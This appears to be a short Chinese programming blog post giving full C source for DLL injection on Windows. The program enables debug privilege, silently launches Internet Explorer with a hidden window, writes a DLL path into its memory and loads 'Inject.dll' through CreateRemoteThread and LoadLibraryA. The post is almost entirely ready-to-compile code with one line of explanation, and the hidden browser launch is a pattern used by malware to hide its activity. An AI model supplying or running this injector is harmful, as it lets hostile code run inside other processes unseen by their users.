学步园

此方法是将DLL注入到目标进程中，使用的是CreateRemoteThread参数lpStartAddress用LoadLibraryA地址代替法，即将LoadLibraryA函数看作是CreateRemoteThread的线程过程函数ThreadProc。

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

DWORD GetProcessID(char *ProcessName)
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
   printf("CreateToolhelp32Snapshot error");
   return 0;
}
BOOL bProcess=Process32First(hProcessSnap,&pe32);
while(bProcess)
{
   if(stricmp(pe32.szExeFile,ProcessName)==0)
    return pe32.th32ProcessID;
   bProcess=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}

int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),
   TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
   &hToken) )
{
   printf("OpenProcessToken error\n");
   return 1;
}
if(!LookupPrivilegeValue(NULL,name,&luid))
{
   printf("LookupPrivilege error!\n");
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
   printf("AdjustTokenPrivileges error!\n");
   return 1;
}
return 0;
}

BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess;
if(EnableDebugPriv(SE_DEBUG_NAME))
{
   printf("add privilege error");
   return FALSE;
}
if((hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId))==NULL)
{
   printf("OpenProcess error\n");
   return FALSE;
}
char *pszLibFileRemote;
    //申请存放dll文件名的路径
pszLibFileRemote=(char *)VirtualAllocEx( hRemoteProcess,
   NULL, lstrlen(DllFullPath)+1,
   MEM_COMMIT, PAGE_READWRITE);
if(pszLibFileRemote==NULL)
{
   printf("VirtualAllocEx error\n");
   return FALSE;
}
//把dll的完整路径写入到内存，
if(WriteProcessMemory(hRemoteProcess,
   pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL) == 0)
{
   printf("WriteProcessMemory error\n");
   return FALSE;
}
//得到LoadLibraryA函数地址
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");
if(pfnStartAddr == NULL)
{
   printf("GetProcAddress error\n");
   return FALSE;
}
HANDLE hRemoteThread;
//启动远程线程
if( (hRemoteThread = CreateRemoteThread(hRemoteProcess,NULL,0,
   pfnStartAddr,pszLibFileRemote,0,NULL))==NULL)
{
   printf("CreateRemoteThread error\n");
   return FALSE;
}
return TRUE;
}

int WINAPI WinMain(
       HINSTANCE hInstance,      // handle to current instance
       HINSTANCE hPrevInstance, // handle to previous instance
       LPSTR lpCmdLine,          // command line
       int nCmdShow              // show state
)
{
char Path[MAX_PATH];
char DllPath[MAX_PATH];
    GetSystemDirectory(Path,sizeof(Path));
Path[3]=0x00; //得到盘符
strcat(Path,"Program Files\\Internet Explorer\\iexplore.exe");
    WinExec(Path,SW_HIDE);
Sleep(1000);
DWORD Pid=GetProcessID("iexplore.exe");
GetCurrentDirectory(sizeof(DllPath),DllPath);
strcat(DllPath,"\\Inject.dll");
    InjectDll(DllPath,Pid);
return 0;
}